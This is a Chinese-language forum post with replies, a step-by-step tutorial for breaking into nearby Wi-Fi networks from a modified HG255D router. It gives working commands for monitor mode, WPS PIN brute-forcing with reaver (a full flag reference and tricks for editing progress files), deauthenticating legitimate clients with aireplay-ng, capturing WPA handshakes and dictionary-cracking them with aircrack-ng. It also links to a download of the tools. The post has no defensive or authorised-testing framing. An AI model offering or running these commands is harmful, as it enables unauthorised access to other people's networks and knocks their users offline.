找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888
查看: 67160|回复: 264

HG255D PIN 固件 完整教程 (含PIN专用固件+命令+工具+注意事项)

 火... [复制链接]
发表于 2014-4-24 01:46 | 显示全部楼层 |阅读模式
本帖最后由 xulouliu 于 2015-2-13 18:28 编辑

HG255D PIN 教程 (含固件+命令+注意事项)
我自己折腾了好久才差不多都搞懂的!


重新整理过的!
设备:HG255D 改散热 改64M内存 改双天线一台
TOTOLINK N200UA 3070芯片无线网卡一个
SSH连接工具  PuTTY  
路由管理工具 WinScp
这两个工具自己去连接啊,
HG255D刷的是HG255D-20130822-OP-PIN码专用 这个

/root 目录是保存reaver Pin的进度的,XX:XX:XX:XX:XX.wpc
---------------------------------------
-加载screen 让后面的操作都在后台操作  =
=    screen 使用方法                                 =
=    screen -ls   #显示screen列表              =
=    screen -r id #进入会话(id编号)       =
=    这是用到的两个命令,新建PUTTY,  =
=    登陆后直接输入:screen-ls                 =
=    就会看到你正在运行的程序编号         =
=    screen -r id 进入会话(id是编号)        =
-----------------------------------------------------上面是官方介绍,进入时候
screen
恢复时候
screen -r
如果出现下图,类似,运行
screen -r 数字






自己对应起来不要搞错了,[一般]内置的是wlan0  外置的wlan1

-----------------------------------------------------------------------------------------------------------------------
= screen                  #进入后台运行                                                                                            =
= ifconfig -a             #查看可用网卡                                                                                            =
= ifconfig wlan1 up       #加载 wlan1 网卡  (查对MAC wlan1 是我挂载的网卡)                          =
= ifconfig wlan1 down     #这个一定要执行,要不然跟我以前一样,只能搜索到一个频道的信号 =
= airmon-ng start wlan1   #开启监听模式 激活到 mon0 端口                                                      =
= airodump-ng mon0        #扫描 SSID 信号列表  ctrl+c 停止                                                      =
= wash -i mon0 -C         #扫描开启WPS的信号                                                                           =
=                         #这个命令有的时候可以能出现开启了WPS的信号,                                        =
=                         #有的时候不显示,挂的卡不同,有可能也会出现,                                        =   
=                         #有的时候显示有的时候不显示                                                                       =
= CTRL+C                  #停止扫描 SSID                                                                                       =   
-----------------------------------------------------------------------------------------------------------------------

在执行了airodump-ng mon0后会显示很多,
这里我说一定54e后面有“点”的才是开启了WPS的,要不然没用哦

reaver -i mon0 -b MAC -a -S -v -c 频道

如果知道前4为可以用下面的命令来
reaver –i mon0 –b MAC –a –S –v –p XXXX (XXXX为前4位PIN码)

参数详解
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
必须参数                                                                                   @                                                                     
-i, 网卡的监视接口,通常是mon0                                              @                                                            
-b, AP的MAC地址                                                                      @                                            
                                                                                                @                                
可选参数                                                                                  @                                       
-m 指定本机MAC地址                                                              @                                                  
-e 路由器的ESSID,一般不用指定                                           @                                                              
-c 信号的频道,如果不指定会自动扫描                                    @                                                                  
-o 输出日志文件                                                                       @                                               
-s 恢复进度文件                                                                        @                 
-C pin成功后执行命令                                                               @                                                   
-D 设置reaver成Daemon                                                          @                                                     
-a 对目标AP自动检测高级参数                                                 @                                                           
-f 禁止频道跳转                                                                        @                                               
-5 使用5G频道                                                                          @                                             
-v 显示不重要警告信息                                                             @                                                                                    
-vv 显示更多的不重要警告信息                                                 @                                                            
-q 只显示关键信息                                                                    @                  
-h, 显示帮助                                                                             @              
                                                                                                 @                                                              
高级选项                                                                                    @
-p, 使用指定的4位或者8位pin码                                                 @
-d, pin间延时,默认1秒                                                             @
-l, AP锁定WPS后等待时间                                                         @
-g, 最大pin次数                                                                         @
-x, 10次意外失败后等待时间,默认0秒                                     @      
-r, 每x次pin后等待y秒                                                               @
-t, 收包超时,默认5秒                                                               @
-T, M5/M7超时,默认0.2秒                                                        @
-A, 不连入AP(连入过程必须有其他程序完成)                         @              
-N, 不发送NACK信息(如果一直pin不动,可以尝试这个参数)  @                           
-S, 使用小DH关键值提高速度(推荐使用)                               @         
-L, 忽略目标AP报告的锁定状态                                                 @  
-E, 每当收到EAP失败包就终止WPS进程                                    @      
-n, 对目标AP总是发送NACK,默认自动                                     @      
-w, 模拟win7注册,默认关闭                                                     @            
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
常见问题:
PIN破密对信号要求极为严格,如果信号稍差,可能导致破密进度变慢或者路由死锁等(重复同一个PIN码 或 timeout)。
AP关闭了WPS、或者没有QSS滴,会出现WARNING: Failed to associate with XX:XX:XX (ESSID: XXXX)

HG255D抓包跑包
airodump-ng -c (信道) --bssid (AP Mac) -w output mon0(抓cap包)
airodump-ng -c (信道) --bssid (AP Mac) -w /mnt/sda1/output mon0(抓cap包放在U盘,U盘直接插上路由系统会自动加载)
aireplay-ng -0 1 -a (AP Mac) -c (合法的客户端)
mon0往已经连接到ap的一个客户端伪造一个离线包,
使其离线重连以便捕捉handshake.注意要收到ACK,才表明被攻击客户端收到,才会下线;发送离线不宜过密过多。
监听捕捉另外一客户端与ap之间的连接,
上方出现WPA handshake: xx:xx:xx:xx........为成功获得握手包也可以使用发下命令来测试是否有握手包
aircrack-ng -w /mnt/sda1/password.TXT -b AP Mac
/mnt/sda1/output*.cap (password.TXT是字典)


怎么保存进度,恢复进度
查看,修改PIN开始的数字
CTRL+C后看/root目录

将mac地址.wpc 备份后,下次可以继续使用。

wpc结构
0          //这个地方是说它的前4位PIN码的进度位置数 前四位对的话会直接跳到90%
0          //这个地方是说后3位PIN数的已经运行测试位置数
0          //0时没有找到,当为1时找到前四位,当为2时全部找到。
1234
0123

3333
.......
.......
9999

003
.....
.....
999
所以前四位很重要,将已经知道的前四们放在最前面会提高你的PIN速度,
我们也可以手动修改wpc文件第一行,如我们要从3000开始pin你可以将它
修改为3004,这样它就会从3000开始PIN了。当我们在PIN时只要你记住了
前四位,你下载用软件修改WPC文件就可了。

最后提供网友优化WPC文件,   PINcode-MAC.rar

保存进度直接下载就可以了。
恢复进度就上传咯
关机,/ROOT目录下的东西不会丢哦
就到这里吧


含PIN专用固件+命令+工具+注意事项见网盘百度网盘有点抽风,直接点连接显示连接被取消分享了,
各位还是复制到地址栏访问吧!

链接:http://pan.baidu.com/s/1mgvEEPM 密码:ntqp2015年2月13日更新连接














本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×

评分

参与人数 4恩山币 +4 收起 理由
Fishhat + 1 赞一个,你是我的呕像!
helen208 + 1 白富美露出了诧异的眼神:屌丝,你真是太厉害了!
llry + 1 土豪,我们做朋友吧!
龙吟之耀 + 1 能再分享下视频吗?

查看全部评分

我的恩山、我的无线 The best wifi forum is right here.
 楼主| 发表于 2014-4-24 01:48 | 显示全部楼层
自己先顶一下!
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2014-4-24 02:50 | 显示全部楼层
沙发没了
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2014-4-24 08:47 | 显示全部楼层
顶一个           
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2014-4-24 09:00 | 显示全部楼层
好人啊,一定要顶
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2014-4-24 10:57 | 显示全部楼层
好人啊,一定要顶
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2014-4-24 13:43 | 显示全部楼层
用不到也顶
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2014-4-24 13:47 来自手机 | 显示全部楼层
可以编译一个703用的吗
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2014-4-24 17:23 | 显示全部楼层
bucuo !bucuo !bucuo !
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

 楼主| 发表于 2014-4-24 21:09 | 显示全部楼层
换号了 发表于 2014-4-24 13:47
可以编译一个703用的吗

哥们我也是拿来主义!不会编译啊!
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2014-4-24 21:43 | 显示全部楼层
Xxxoooxoxo
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2014-4-24 21:47 | 显示全部楼层
kan kan ka n
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2014-4-24 21:53 来自手机 | 显示全部楼层
不错…………正需要,谢谢楼主
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2014-4-24 21:59 | 显示全部楼层
正需要,谢谢楼主
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2014-4-24 22:40 | 显示全部楼层
好东西,支持。。。。。。。。
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

有疑问请添加管理员QQ86788181|手机版|小黑屋|Archiver|恩山无线论坛(常州市恩山计算机开发有限公司版权所有) ( 苏ICP备05084872号 )

GMT+8, 2024-3-29 07:18

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

| 江苏省互联网有害信息举报中心 举报信箱:js12377 | @jischina.com.cn 举报电话:025-88802724 本站不良内容举报信箱:68610888@qq.com 举报电话:0519-86695797

快速回复 返回顶部 返回列表